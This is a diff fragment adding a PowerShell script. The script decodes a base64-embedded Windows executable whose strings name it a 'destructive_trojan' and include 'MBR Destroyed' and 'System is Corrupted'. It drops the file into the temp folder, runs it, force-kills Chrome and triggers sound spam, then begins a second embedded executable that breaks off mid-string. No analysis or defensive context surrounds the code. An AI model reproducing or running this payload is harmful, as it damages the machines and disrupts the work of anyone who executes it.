+$b64 = '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AwAAAQ8A+QUDAAABEQC3AgMAAAETAOwIAgAAARUA1wACAAABFwDBBwIAAAEZAL4ABAAAARsAZQQDAAABHQBaAgMAAAEfAGoIAwAAASEAYwgDAAABIwB1CAMAAAElAMgAAwAAAScAwQIFAAABKQDaAgUAQAErAIEHBgBAAS0AmAIHAHw6AAAMAASAAAAAAAAAAAAAAAAAAAAAANcIAAAEAAAAAAAAAAAAAADOAMoBAAAAAAQAAAAAAAAAAAAAANcAVgQAAAAABAAAAAAAAAAAAAAAzgAIBwAAAAAEAAIABQACAAYAAgAHAAMAAAAAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT0yMABDbGFzczEAa2VybmVsMzIAVUludDMyADxNb2R1bGU+ADxQcml2YXRlSW1wbGVtZW50YXRpb25EZXRhaWxzPgBBQ19TUkNfQUxQSEEANjE0MzhCMjg4OTEwMDYwMTYxMUI0RDNBRjBGMkUwREEzMjUxN0JGMTM3NjJDQjQwNTYxRkM2OUNGRjExNTJGQgBDcmVhdGVDb21wYXRpYmxlREMAUmVsZWFzZURDAERlbGV0ZURDAEdldERDAEdldFdpbmRvd0RDAFNSQ0FORABOT1RTUkNFUkFTRQBCTEVOREZVTkNUSU9OAEFDX1NSQ19PVkVSAFdISVRFTkVTUwBCTEFDS05FU1MAQ0FQVFVSRUJMVABTUkNQQUlOVABNRVJHRVBBSU5UAFBBVFBBSU5UAFBPSU5UAFNSQ0lOVkVSVABQQVRJTlZFUlQARFNUSU5WRVJUAEV4dHJhY3RJY29uRXhXAGdldF9YAE5PVFNSQ0NPUFkATUVSR0VDT1BZAFBBVENPUFkAZ2V0X1kAdmFsdWVfXwBTb3VyY2VDb25zdGFudEFscGhhAGFscGhhAG1zY29ybGliAEZyb21IZGMAaGRjAG5YU3JjAG5ZU3JjAGhkY1NyYwBuV2lkdGhTcmMAblhPcmlnaW5TcmMAbllPcmlnaW5TcmMAbkhlaWdodFNyYwBHZW5lcmljUmVhZABGaWxlU2hhcmVSZWFkAFRocmVhZABnZXRfUmVkAGxwT3ZlcmxhcHBlZABoV25kAEdkaUFscGhhQmxlbmQAaHduZABkd1NoYXJlTW9kZQBJRGlzcG9zYWJsZQBSdW50aW1lRmllbGRIYW5kbGUAQ2xvc2VIYW5kbGUAaEhhbmRsZQBGcm9tSGFuZGxlAFJlY3RhbmdsZQBDcmVhdGVGaWxlAGhUZW1wbGF0ZUZpbGUAV3JpdGVGaWxlAGhGaWxlAHNGaWxlAGZpbGUAbHBGaWxlTmFtZQBEYXRlVGltZQBWYWx1ZVR5cGUAYkVyYXNlAEZpbGVGbGFnRGVsZXRlT25DbG9zZQBEaXNwb3NlAEdlbmVyaWNXcml0ZQBGaWxlU2hhcmVXcml0ZQBuTnVtYmVyT2ZCeXRlc1RvV3JpdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBHZW5lcmljRXhlY3V0ZQBnZGl0ZXN0LmV4ZQBNYnJTaXplAFN5c3RlbS5UaHJlYWRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBEcmF3U3RyaW5nAE9wZW5FeGlzdGluZwBTeXN0ZW0uRHJhd2luZwBDcmVhdGVTb2xpZEJydXNoAGdldF9XaWR0aABuV2lkdGgAcHJvY2Vzc0luZm9ybWF0aW9uTGVuZ3RoAGhnZGlvYmoAaGJtTWFzawB4TWFzawB5TWFzawBHZW5lcmljQWxsAGdkaTMyLmRsbABrZXJuZWwzMi5kbGwAU2hlbGwzMi5kbGwAVXNlcjMyLmRsbAB1c2VyMzIuZGxsAG50ZGxsLmRsbABTeXN0ZW0AUmFuZG9tAGdldF9Cb3R0b20ARW51bQBvcF9MZXNzVGhhbgBkZXN0cnVjdGl2ZV90cm9qYW4AVGltZVNwYW4AZ2V0X1ByaW1hcnlTY3JlZW4AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBNYWluAGxhcmdlSWNvbgBwaUxhcmdlVmVyc2lvbgBwaVNtYWxsVmVyc2lvbgBwcm9jZXNzSW5mb3JtYXRpb24Ab3BfU3VidHJhY3Rpb24AYmxlbmRGdW5jdGlvbgBkd0NyZWF0aW9uRGlzcG9zaXRpb24AWmVybwBCbGVuZE9wAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAAU2xlZXAAZHdSb3AAZ2V0X1RvcABudW1iZXIAbHBCdWZmZXIAY3JDb2xvcgAuY3RvcgBJbnRQdHIAR3JhcGhpY3MAU3lzdGVtLkRpYWdub3N0aWNzAEZyb21TZWNvbmRzAGdldF9Cb3VuZHMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBkd0ZsYWdzQW5kQXR0cmlidXRlcwBscFNlY3VyaXR5QXR0cmlidXRlcwBCbGVuZEZsYWdzAHNldF9Gb3JtYXRGbGFncwBTdHJpbmdGb3JtYXRGbGFncwBmbGFncwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBhbW91bnRJY29ucwBUZXJuYXJ5UmFzdGVyT3BlcmF0aW9ucwBSdW50aW1lSGVscGVycwBwcm9jZXNzSW5mb3JtYXRpb25DbGFzcwBkd0Rlc2lyZWRBY2Nlc3MAaFByb2Nlc3MATnRTZXRJbmZvcm1hdGlvblByb2Nlc3MAQWxwaGFGb3JtYXQAU3RyaW5nRm9ybWF0AGZvcm1hdABFeHRyYWN0AEludmFsaWRhdGVSZWN0AG5Cb3R0b21SZWN0AGxwUmVjdABuVG9wUmVjdABuTGVmdFJlY3QAblJpZ2h0UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAblhMZWZ0AG5ZTGVmdABnZXRfTGVmdABnZXRfUmlnaHQAZ2V0X0hlaWdodABuSGVpZ2h0AG9wX0ltcGxpY2l0AFBsZ0JsdABTdHJldGNoQmx0AFBhdEJsdABCaXRCbHQAbHBQb2ludABGb250AG5YRGVzdABuWURlc3QAaGRjRGVzdABuV2lkdGhEZXN0AG5YT3JpZ2luRGVzdABuWU9yaWdpbkRlc3QAbkhlaWdodERlc3QAZ2RpdGVzdABOZXh0AGdldF9Ob3cAR2V0RGVza3RvcFdpbmRvdwBFeHRyYWN0SWNvbkV4AGlJbmRleABJbml0aWFsaXplQXJyYXkAAAAAF3MAaABlAGwAbAAzADIALgBkAGwAbAAAC0UAUgBSAE8AUgAAJ1MAeQBzAHQAZQBtACAAaQBzACAAQwBvAHIAcgB1AHAAdABlAGQAABdTAHkAcwB0AGUAbQAgAEYAQQBJAEwAABshAFMAaAB1AHQAZABvAHcAbgAgAE4A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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAB4OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='
+$decodedFile = [System.Convert]::FromBase64String($b64)
+$File6 = "$env:temp/GDI6"+".exe"
+Set-Content -Path $File6 -Value $decodedFile -Encoding Byte
+& $File6
+Sleep 8
+cmd.exe ("/c taskkill /F /IM chrome.exe & exit")
+SoundSpam
+SoundSpam
+# Full
+$b64 = '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